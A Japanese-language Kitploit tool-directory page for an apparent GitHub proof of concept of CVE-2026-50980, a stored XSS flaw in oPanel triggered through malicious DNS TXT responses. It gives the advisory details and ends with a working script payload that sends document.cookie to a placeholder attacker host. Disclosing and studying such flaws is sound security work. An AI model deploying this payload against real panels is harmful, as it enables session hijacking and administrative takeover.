Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-50980 — oPanel DNSベースのクロスサイトスクリプティング (XSS) & セッションハイジャック | Kitploit
ツール/GitHubGitHub/bugresearch/cve-2026-50980
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティDNS分析
GitHubbugresearch/cve-2026-50980

CVE-2026-50980

oPanel DNSベースのクロスサイトスクリプティング (XSS) & セッションハイジャック

リポジトリを見る
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-50980: DNSベースのクロスサイトスクリプティング (XSS) および oPanel におけるセッションハイジャック

概要

  • CVE ID: CVE-2026-50980
  • 製品: oPanel
  • 影響を受けるバージョン: < v1.20.25
  • 脆弱性の種類: 保存型クロスサイトスクリプティング (XSS)(DNS経由)/ セッションハイジャック
  • 深刻度: 高 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)

説明

oPanel(v1.20.25 より前のバージョン)には、DNS 応答の不適切な処理とサニタイズに起因するクロスサイトスクリプティング (XSS) の脆弱性が存在します。パネルが攻撃者管理下のネームサーバーに対して DNS クエリ(例:ドメイン情報の取得、DNS 伝搬の確認、TXT レコードのクエリ)を実行すると、返された DNS レコードが適切な HTML エンコードなしに Web インターフェースに直接反映されます。

攻撃者は、TXT レコードクエリに対して悪意のある JavaScript ペイロードで応答するように不正な DNS サーバーを設定することで、この脆弱性を悪用できます。認証済みの oPanel ユーザー(管理者など)が DNS 応答が表示されるページを閲覧すると、ブラウザセッションのコンテキスト内でペイロードが実行されます。

影響

悪用に成功すると、攻撃者は被害者のブラウザで任意の JavaScript を実行できます。概念実証で示されているように、これを利用して機密性の高い認証 Cookie(document.cookie)を窃取し、完全なセッションハイジャックと oPanel 環境への不正な管理アクセスを実現できます。

概念実証 (PoC)

この脆弱性の悪用には、攻撃者が悪意のある DNS サーバーと、窃取されたデータを取得するための HTTP リスナーをセットアップする必要があります。

1. 攻撃者側のインフラ構築

攻撃者は、UDP ポート 53 で動作する不正な DNS サーバーを実行し、あらゆる TXT クエリに対して XSS ペイロードで応答するように設定します。

悪意のある TXT レコードペイロード:

root@kitploit:~
<script>new Image().src='http://<ATTACKER_IP>:<HTTP_PORT>/log?cookie='+document.cookie;</script>
ツールをダウンロード